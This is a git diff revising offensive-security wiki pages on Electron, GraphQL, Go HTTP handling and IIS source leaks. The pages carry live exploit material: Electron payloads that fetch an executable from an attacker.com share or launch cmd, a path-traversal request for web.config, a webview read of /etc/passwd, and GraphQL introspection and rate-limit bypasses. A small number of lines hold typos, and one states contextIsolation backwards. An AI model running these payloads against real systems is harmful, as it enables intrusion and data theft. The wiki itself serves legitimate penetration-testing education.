-#### Analyze
-
-References: https://medium.com/techiepedia/javascript-code-review-guide-for-bug-bounty-hunters-c95a8aa7037a
-
-Look for:
-
-* Anti-debug loading
-  * Angular: [enableProdMode](https://blog.nvisium.com/angular-for-pentesters-part-2)
-* Secrets
-  * Use:
-    * [JS Miner](https://github.com/PortSwigger/js-miner)
-    * [RegHex](https://github.com/l4yton/RegHex) patterns
-    * [gf](https://github.com/tomnomnom/gf/tree/master/examples) patterns
-    * Grep relevant dictionary patterns:
-      * pass, user, admin
-      * auth, login, sign, challenge, 2fa
-      * key, apikey, api\_key, api-key, jwt, token
-      * secret, security, secure
-      * ...
-    * Manual review
-  * If API key found, check here for potential usage syntax: https://github.com/streaak/keyhacks.
-* Vuln functions
-  * InnerHTML() - If you found this, it means there is a potential chance for XSS if no proper sanitisation takes place. Even if your payload is sanitised, don’t worry. Trace the code to find out where the sanitisation takes place. Study it and try to get around the sanitisation.
-  * Postmessage() - If you have read my previous post (https://medium.com/techiepedia/what-are-sop-cors-and-ways-to-exploit-it-62a5e02100dc), you would notice that Postmessage() might lead to potential CORS issue. If the second parameter of the function set to \*, you are the lucky one. Checkout my previous post to understand more about the mechanism behind.
-  * String.prototype.search() - This function looks normal. Why would it be a dangerous function? Well, it is because some developers used this to find occurrence of a string inside another string. However, “.” is treated as wildcard in this function. So, if this function is used as sanitisation check, you can simply bypass it by inputting “.”. Checkout Filedescryptor’s hackerone report: https://hackerone.com/reports/129873
-* Endpoints & params
-  * Use [LinkFinder](https://github.com/GerbenJavado/LinkFinder) & [JS Miner](https://github.com/PortSwigger/js-miner).
-* Vuln libs & deps
-  * Use [Retire.js](https://retirejs.github.io/retire.js/) and [NPM](https://snyk.io/advisor/) (scroll down to security section > all versions link).
-* Cloud URLs
-  * Use [JS Miner](https://github.com/PortSwigger/js-miner).
-* Subdomains
-  * Use [JS Miner](https://github.com/PortSwigger/js-miner).
-* Logic Flaws
-  * Gain situational awareness:
-    * `use strict;`?
-  * Grep for client-side controls:
-    * disable, enable, hidden, hide, show
-    * catch, finally, throw, try
-    * input, validate, verify, valid, correct, check, confirm, require, ..
-  * Grep for non-primatives:
-    * function , =>
-    * class
-
-### Dynamic Analysis
-
 References
 
 * https://www.youtube.com/watch?v=\_v8r\_t4v6hQ
diff --git a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
index 97a46c7a3..e5c3ce69e 100644
--- a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
+++ b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -58,7 +58,7 @@ You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for e
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
index 8436e4f41..daa5c2b03 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -16,8 +16,7 @@ Other ways to support HackTricks:
 
 ## Introduction
 
-Electron is **based on Chromium**, but it is not a browser. Certain principles and security mechanisms implemented by modern browsers are not in place.\
-You could see Electron like a local backend+frontend app where **NodeJS** is the **backend** and **chromium** is the **frontend**.
+Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers.
 
 Usually you might find the electron app code inside an `.asar` application, in order to obtain the code you need to extract it:
 
@@ -53,7 +52,7 @@ win.loadURL(`file://path/to/index.html`);
 
 Settings of the **renderer process** can be **configured** in the **main process** inside the main.js file. Some of the configurations will **prevent the Electron application to get RCE** or other vulnerabilities if the **settings are correctly configured**.
 
-The desktop application might have access to the user’s device through Node APIs. The following two configurations are responsible for providing mechanisms to **prevent the application JavaScript from having direct access to the user’s device** and system level commands.
+The electron application **could access the device** via Node apis although it can be configure to prevent it:
 
 * **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process.
 * **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated.
@@ -210,54 +209,51 @@ window.addEventListener('click', (e) => {
 
 ## RCE via shell.openExternal
 
-If the Electron desktop application is deployed with proper `nodeIntegration`, `contextIsolation` settings; it simply means that **client-side RCE by targeting preload scripts or Electron native code from the main process can not be achieved**.
+For more info about this examples check [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) and [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
 
-Each time a user clicks the link or opens a new window, the following event listeners are invoked:
 
-{% code overflow="wrap" %}
+hen deploying an Electron desktop application, ensuring the correct settings for `nodeIntegration` and `contextIsolation` is crucial. It's established that **client-side remote code execution (RCE)** targeting preload scripts or Electron's native code from the main process is effectively prevented with these settings in place.
+
+Upon a user interacting with links or opening new windows, specific event listeners are triggered, which are crucial for the application's security and functionality:
+
 ```javascript
 webContents.on("new-window", function (event, url, disposition, options) {}
 webContents.on("will-navigate", function (event, url) {}
 ```
-{% endcode %}
 
-The desktop application **overrides these listeners** to implement the desktop application’s own **business logic**. During the creation of new windows, the application checks whether the navigated link should be opened in a desktop application’s window or tab, or whether it should be opened in the web browser. In our example the verification is implemented with the function `openInternally`, if it returns `false`, the application will assume that the link should be opened in the web browser using the `shell.openExternal` function.
+These listeners are **overridden by the desktop application** to implement its own **business logic**. The application evaluates whether a navigated link should be opened internally or in an external web browser. This decision is typically made through a function, `openInternally`. If this function returns `false`, it indicates that the link should be opened externally, utilizing the `shell.openExternal` function.
 
 **Here is a simplified pseudocode:**
 
-![](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
+![https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
 
-![](<../../../.gitbook/assets/image (620).png>)
+![https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png](<../../../.gitbook/assets/image (620).png>)
 
-Accordingly to Electron JS security best practices, the `openExternal` function **should not accept untrusted content** **because that could lead to RCE abusing different potocols** if the application does not limit users navigation through protocols such as https:// or http://.
+Electron JS security best practices advise against accepting untrusted content with the `openExternal` function, as it could lead to RCE through various protocols. Operating systems support different protocols that might trigger RCE. For detailed examples and further explanation on this topic, one can refer to [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), which includes Windows protocol examples capable of exploiting this vulnerability.
 
-Different OS support different protocols that could trigger RCE, for more info about them check [https://positive.security/blog/url-open-rce](https://positive.security/blog/url-open-rce#windows-10-19042) but here you have some Windows examples:
+**Examples of Windows protocol exploits include:**
 
 ```html
 <script>
 window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
 </script>
 
-
 <script>
-window.open("search-ms:query=malicious_executable.exe&crumb=location:%5C%[5Cattacker.com](<http://5cattacker.com/>)%5Csmb_share%5Ctools&displayname=Important%20update")
+window.open("search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update")
 </script>
 
-
 <script>
 window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D")
 </script>
 ```
 
-For more info about this examples check [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) and [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
+## Reading Internal Files: XSS + contextIsolation
 
-## Read Internal Files: XSS + contextIsolation
+**Disabling `contextIsolation` enables the use of `<webview>` tags**, similar to `<iframe>`, for reading and exfiltrating local files. An example provided demonstrates how to exploit this vulnerability to read the contents of internal files:
 
-If `contextIsolation` set to false you can try to use \<webview> (similar to \<iframe> but can load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
+![](../../../.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png)
 
-![](../../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)
-
-Another way to **read an internal file** from this [**writeup**](https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app):
+Further, another method for **reading an internal file** is shared, highlighting a critical local file read vulnerability in an Electron desktop app. This involves injecting a script to exploit the application and exfiltrate data:
 
 ```html
 <br><BR><BR><BR>
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
index dbb79501d..c48bfb0ef 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -77,7 +77,7 @@ Exploit:
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/golang.md b/network-services-pentesting/pentesting-web/golang.md
index c94f47ecf..987248701 100644
--- a/network-services-pentesting/pentesting-web/golang.md
+++ b/network-services-pentesting/pentesting-web/golang.md
@@ -17,15 +17,17 @@ Other ways to support HackTricks:
 
 ## CONNECT method
 
-In golang, the library net/http usually transforms the path to a canonical one before accessing it:
+In the Go programming language, a common practice when handling HTTP requests, specifically using the `net/http` library, is the automatic conversion of the request path into a standardized format. This process involves:
 
-* /flag/ -- Is responded with a redirect to /flag
-* /../flag --- Is responded with a redirect to /flag
-* /flag/. -- Is responded with a redirect to /flag
+- Paths ending with a slash (`/`) like `/flag/` are redirected to their non-slash counterpart, `/flag`.
+- Paths containing directory traversal sequences such as `/../flag` are simplified and redirected to `/flag`.
+- Paths with a trailing period as in `/flag/.` are also redirected to the clean path `/flag`.
 
-However, when the CONNECT method is used this doesn't happen. So, if you need to access some protected resource you can abuse this trick: 
+However, an exception is observed with the use of the `CONNECT` method. Unlike other HTTP methods, `CONNECT` does not trigger the path normalization process. This behavior opens a potential avenue for accessing protected resources. By employing the `CONNECT` method alongside the `--path-as-is` option in `curl`, one can bypass the standard path normalization and potentially reach restricted areas.
 
-```text
+The following command demonstrates how to exploit this behavior:
+
+```bash
 curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag
 ```
 
diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md
index 42710252c..086a03bc6 100644
--- a/network-services-pentesting/pentesting-web/graphql.md
+++ b/network-services-pentesting/pentesting-web/graphql.md
@@ -16,27 +16,26 @@ Other ways to support HackTricks:
 
 ## Introduction
 
-GraphQL acts as an alternative to REST API. Rest APIs require the client to send multiple requests to different endpoints on the API to query data from the backend database. With graphQL you only need to send one request to query the backend. This is a lot simpler because you don’t have to send multiple requests to the API, a single request can be used to gather all the necessary information.
+GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes.
 
-## GraphQL
+## GraphQL and Security
 
-As new technologies emerge so will new vulnerabilities. By **default** graphQL does **not** implement **authentication**, this is put on the developer to implement. This means by default graphQL allows anyone to query it, any sensitive information will be available to attackers unauthenticated.
+With the advent of new technologies, including GraphQL, new security vulnerabilities also emerge. A key point to note is that **GraphQL does not include authentication mechanisms by default**. It's the responsibility of developers to implement such security measures. Without proper authentication, GraphQL endpoints may expose sensitive information to unauthenticated users, posing a significant security risk.
 
-When performing your directory brute force attacks make sure to add the following paths to check for graphQL instances.
+### Directory Brute Force Attacks and GraphQL
 
-* `/graphql`
-* `/graphiql`
-* `/graphql.php`
-* `/graphql/console`
-* `/api`
-* `/api/graphql`
-* `/graphql/api`
-* `/graphql/graphql`
+To identify exposed GraphQL instances, the inclusion of specific paths in directory brute force attacks is recommended. These paths are:
 
-<figure><img src="../../.gitbook/assets/image (6) (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
+- `/graphql`
+- `/graphiql`
+- `/graphql.php`
+- `/graphql/console`
+- `/api`
+- `/api/graphql`
+- `/graphql/api`
+- `/graphql/graphql`
 
-Once you find an open graphQL instance you need to know **what queries it supports**. This can be done by using the introspection system, more details can be found here: [**GraphQL: A query language for APIs.**\
-It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…](https://graphql.org/learn/introspection/)
+Identifying open GraphQL instances allows for the examination of supported queries. This is crucial for understanding the data accessible through the endpoint. GraphQL's introspection system facilitates this by detailing the queries a schema supports. For more information on this, refer to the GraphQL documentation on introspection: [**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/)
 
 ### Fingerprint
 
@@ -44,9 +43,11 @@ The tool [**graphw00f**](https://github.com/dolevf/graphw00f) is capable to dete
 
 #### Universal queries <a href="#universal-queries" id="universal-queries"></a>
 
-If you send `query{__typename}` to any GraphQL endpoint, it will include the string `{"data": {"__typename": "query"}}` somewhere in its response. This is known as a universal query, and is a useful tool in probing whether a URL corresponds to a GraphQL service.
+To check if a URL is a GraphQL service, a **universal query**, `query{__typename}`, can be sent. If the response includes `{"data": {"__typename": "Query"}}`, it confirms the URL hosts a GraphQL endpoint. This method relies on GraphQL's `__typename` field, which reveals the type of the queried object.
 
-The query works because every GraphQL endpoint has a reserved field called `__typename` that returns the queried object's type as a string.
+```javascript
+query{__typename}
+```
 
 ### Basic Enumeration
 
@@ -251,11 +252,9 @@ And during the **enumeration phase** I discovered that the "_**dbuser**_" object
 
 If you can search by a string type, like: `query={theusers(description: ""){username,password}}` and you **search for an empty string** it will **dump all data**. (_Note this example isn't related with the example of the tutorials, for this example suppose you can search using "**theusers**" by a String field called "**description**"_).
 
-GraphQL is a relatively new technology that is starting to gain some traction among startups and large corporations. Other than missing authentication by default graphQL endpoints can be vulnerable to other bugs such as IDOR.
-
 ### Searching
 
-For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
+In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database.
 
 You can **search** persons **by** the **name** and get their emails:
 
@@ -329,7 +328,7 @@ In the **introspection** you can find the **declared** **mutations**. In the fol
 
 ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
 
-For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
+In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database.
 
 A mutation to **create new** movies inside the database can be like the following one (in this example the mutation is called `addMovie`):
 
@@ -346,7 +345,7 @@ mutation {
 
 **Note how both the values and type of data are indicated in the query.**
 
-There may also be also a **mutation** to **create** **persons** (called `addPerson` in this example) with friends and files (note that the friends and films have to exist before creating a person related to them):
+Additionally, the database supports a **mutation** operation, named `addPerson`, which allows for the creation of **persons** along with their associations to existing **friends** and **movies**. It's crucial to note that the friends and movies must pre-exist in the database before linking them to the newly created person.
 
 ```javascript
 mutation {
@@ -399,25 +398,23 @@ A nice **wordlist** to discover [**GraphQL entities can be found here**](https:/
 
 ### Bypassing GraphQL introspection defences <a href="#bypassing-graphql-introspection-defences" id="bypassing-graphql-introspection-defences"></a>
 
-If you cannot get introspection queries to run for the API you are testing, try inserting a **special character after the `__schema` keyword**.
+### **Bypassing GraphQL Introspection Defenses**
 
-When developers disable introspection, they could use a regex to exclude the `__schema` keyword in queries. You should try characters like **spaces**, **new lines** and **commas**, as they are **ignored** by GraphQL but not by flawed regex.
-
-As such, if the developer has only excluded `__schema{`, then the below introspection query would not be excluded.
+To bypass restrictions on introspection queries in APIs, inserting a **special character after the `__schema` keyword** proves effective. This method exploits common developer oversights in regex patterns that aim to block introspection by focusing on the `__schema` keyword. By adding characters like **spaces, new lines, and commas**, which GraphQL ignores but might not be accounted for in regex, restrictions can be circumvented. For instance, an introspection query with a newline after `__schema` may bypass such defenses:
 
 ```bash
-#Introspection query with newline
+# Example with newline to bypass
 { 
     "query": "query{__schema
     {queryType{name}}}"
 }
 ```
 
-If this doesn't work, try running the probe over an alternative request method, as introspection may only be disabled over POST. Try a GET request, or a POST request with a content-type of `x-www-form-urlencoded`.
+If unsuccessful, consider alternative request methods, such as **GET requests** or **POST with `x-www-form-urlencoded`**, since restrictions may apply only to POST requests.
 
-### Leaked GraphQL Structures
+### **Discovering Exposed GraphQL Structures**
 
-If introspection is disabled, try looking at the website source code. The queries are often pre loaded into browser as javascript libraries. These prewritten queries can reveal powerful information about the schema and use of each object and function. The `Sources` tab of the developer tools can search all files to enumerate where the queries are saved. Sometimes even the administrator protected queries are already exposed.
+When introspection is disabled, examining the website's source code for preloaded queries in JavaScript libraries is a useful strategy. These queries can be found using the `Sources` tab in developer tools, providing insights into the API's schema and revealing potentially **exposed sensitive queries**. The commands to search within the developer tools are:
 
 ```javascript
 Inspect/Sources/"Search all files"
@@ -481,20 +478,18 @@ In the below example you can see that the operation is "forgotPassword" and that
 
 <figure><img src="../../.gitbook/assets/GraphQLAuthBypassMethod.PNG" alt=""><figcaption></figcaption></figure>
 
-## Rate limit bypass using aliases
+## Bypassing Rate Limits Using Aliases in GraphQL
 
-Ordinarily, GraphQL objects can't contain multiple properties with the same name. Aliases enable you to bypass this restriction by **explicitly naming the properties you want** the API to return. You can use aliases to return **multiple instances of the same** type of object in one request.
+In GraphQL, aliases are a powerful feature that allow for the **naming of properties explicitly** when making an API request. This capability is particularly useful for retrieving **multiple instances of the same type** of object within a single request. Aliases can be employed to overcome the limitation that prevents GraphQL objects from having multiple properties with the same name.
 
-For more information on GraphQL aliases, see [Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases).
+For a detailed understanding of GraphQL aliases, the following resource is recommended: [Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases).
 
-While aliases are intended to limit the number of API calls you need to make, they can also be used to brute force a GraphQL endpoint.
+While the primary purpose of aliases is to reduce the necessity for numerous API calls, an unintended use case has been identified where aliases can be leveraged to execute brute force attacks on a GraphQL endpoint. This is possible because some endpoints are protected by rate limiters designed to thwart brute force attacks by restricting the **number of HTTP requests**. However, these rate limiters might not account for the number of operations within each request. Given that aliases allow for the inclusion of multiple queries in a single HTTP request, they can circumvent such rate limiting measures.
 
-Many endpoints will have some sort of **rate limiter in place to prevent brute force attacks**. Some rate limiters work based on the **number of HTTP requests** received rather than the number of operations performed on the endpoint. Because aliases effectively enable you to send multiple queries in a single HTTP message, they can bypass this restriction.
-
-The simplified example below shows a series of **aliased queries checking whether store discount codes are valid**. This operation could potentially bypass rate limiting as it is a single HTTP request, even though it could potentially be used to check a vast number of discount codes at once.
+Consider the example provided below, which illustrates how aliased queries can be used to verify the validity of store discount codes. This method could sidestep rate limiting since it compiles several queries into one HTTP request, potentially allowing for the verification of numerous discount codes simultaneously.
 
 ```bash
-#Request with aliased queries
+# Example of a request utilizing aliased queries to check for valid discount codes
 query isValidDiscount($code: Int) {
     isvalidDiscount(code:$code){
         valid
diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
index ad7b4b69e..f37bfb099 100644
--- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -70,184 +70,61 @@ Use it without adding any extension, the files that need it have it already.
 
 ### Leaking source code
 
+Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
+
 {% hint style="info" %}
 As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\
 From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
 Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\
-Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
+
 {% endhint %}
 
-As any .Net application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identifies every binary file the application uses.
+In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags.
+
+### **Exploring Binary Files**
+
+An example of accessing the **web.config** file is shown below:
 
 ```markup
 GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
 Host: example-mvc-application.minded
-[...]
-
-HTTP/1.1 200 OK
-[...]
-<?xml version="1.0" encoding="utf-8"?>
-<configuration>
-  <configSections>
-    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
-  </configSections>
-  <appSettings>
-    <add key="webpages:Version" value="3.0.0.0" />
-    <add key="webpages:Enabled" value="false" />
-    <add key="ClientValidationEnabled" value="true" />
-    <add key="UnobtrusiveJavaScriptEnabled" value="true" />
-  </appSettings>
-<system.web>
-  <authentication mode="None" />
-  <compilation debug="true" targetFramework="4.6.1" />
-  <httpRuntime targetFramework="4.6.1" />
-</system.web>
-<system.webServer>
-  <modules>
-    <remove name="FormsAuthentication" />
-  </modules>
-</system.webServer>
-<runtime>
-  <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
-    <dependentAssembly>
-      <assemblyIdentity name="Microsoft.Owin.Security" />
-      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
-      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
-      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="Microsoft.Owin" />
-      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
-      <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="System.Web.Optimization" />
-      <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="WebGrease" />
-      <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="System.Web.Helpers" />
-      <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="System.Web.Mvc" />
-      <bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
-    </dependentAssembly>
-    <dependentAssembly>
-      <assemblyIdentity name="System.Web.WebPages" />
-      <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
-    </dependentAssembly>
-  </assemblyBinding>
 ```
 
-In the previous output you can references to several "**assemblyIdentity**". These are files that may be located inside the /bin folder. For example: **/bin/WebGrease.dll.**
+This request reveals various settings and dependencies, such as:
 
-Other files that could be found in the root directory of a .Net application are **/global.asax**
+- **EntityFramework** version
+- **AppSettings** for webpages, client validation, and JavaScript
+- **System.web** configurations for authentication and runtime
+- **System.webServer** modules settings
+- **Runtime** assembly bindings for numerous libraries like **Microsoft.Owin**, **Newtonsoft.Json**, and **System.Web.Mvc**
 
-```markup
-<%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
-```
+These settings indicate that certain files, such as **/bin/WebGrease.dll**, are located within the application's /bin folder.
 
-And **/connectionstrings.config**
+### **Root Directory Files**
 
-**Note: this file contains passwords!**
+Files found in the root directory, like **/global.asax** and **/connectionstrings.config** (which contains sensitive passwords), are essential for the application's configuration and operation.
 
-```markup
-<connectionStrings>
